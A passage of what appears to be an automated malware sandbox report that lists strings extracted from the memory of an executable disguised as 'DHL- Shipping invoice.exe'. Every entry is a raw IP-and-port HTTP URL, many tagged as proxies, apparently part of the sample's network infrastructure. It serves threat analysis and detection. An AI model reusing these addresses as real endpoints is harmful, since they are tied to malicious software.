                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:64193
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:64193://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.184.81
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.184.81://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.184.81:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.69.214.139:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.89.194.121:60322
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.89.194.121:60322://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.89.206.252:44590
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.89.206.252:44590://proxy8
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.89.238.24:8000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://16.170.1.8
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://16.170.1.8://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://16.170.1.8:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.119.148.190:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.119.148.190:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:31745
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:31745://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:35138
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:35138://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:38586
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:38586://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:5436
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:5436://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:5784
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:5784://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:6116
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:6116://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.254.240:1138
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.254.240:1138://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980409000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.254.240:48502://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9816B5000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98161C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.254.240:5552
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98161C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.254.240:5552://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981EAE000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.16.90.35:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981EB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.16.90.35:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981581000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.226.203.247:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9815AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.226.203.247:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9806DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98068C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:2525
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:2525://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98068C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.132.111.243:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.132.111.243:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.34.67.83:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.34.67.83:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.35.83.251:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.35.83.251:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.49.91.13:1337
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.49.91.13:1337://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.147.193:12762
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.147.193:12762://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:18693
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:18693://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:18693f&(
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:23288
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:30189
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:30189://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:34916
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:34916://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:45725
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:45725://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.42:22653
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.42:22653://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.42:50386
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.42:50386://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.42:52463://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.42:5379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.42:5379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.42:53948
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.42:53948://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.78:49145://proxySG?
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.78:49145_
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.0.220.214:23561
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.0.220.214:23561://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.0.220.216:44158
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.0.220.216:44158://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.120.71.11:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.236.128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.236.128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.236.128:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.36.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.36.208:38242
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.36.208:38242://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.79.97:2877
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.79.97:2877://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.241.5
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.241.5://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.241.5:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.10
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.104
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.104://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.104:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.10://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.10:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.150
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.150://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.150:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.158
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.158:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.159:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.230
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980409000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.230://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9803F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.230:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.45:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.7
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.7://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.7:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.8
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.8://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.242.8:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.247.57
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.247.57://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.247.57:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.247.92
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.247.92://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.247.92:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.250.145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.250.145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.159.250.145:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.210.192.135:41648
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.102.121:18446
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.102.121:18446://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.102.195:60891
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.102.195:60891://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.103.84:18088
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.103.84:18088://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.103.87:36304
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.103.87:36304://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.121.11:18809
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.121.11:18809://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.121.11:8989
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.121.11:8989://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.121.173
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.121.173:35183://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.121.173:52577
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.121.173:52577://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98344F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.121.173:62976
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.121.173:62976://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.154.177:32753://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.154.178
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.154.178:32210
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.154.178:32210://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.162.156:49377
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.162.156:49377://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.163.137:7484
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.163.137:7484://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.165.203
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.165.203://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.165.203:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.165.6:42624
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.165.6:42624://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.170.144
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9802FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.170.144:31701
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9802FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.170.144:31701://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.170.144:32233
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.170.144:32233://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.170.144:34617
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.170.144:34617://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.170.144:37592
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.170.144:37592://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.170.144:39503
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.170.144:39503://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.170.144:47558
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.170.144:47558://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.197.102:42019
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.197.102:42019://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.197.102:58740
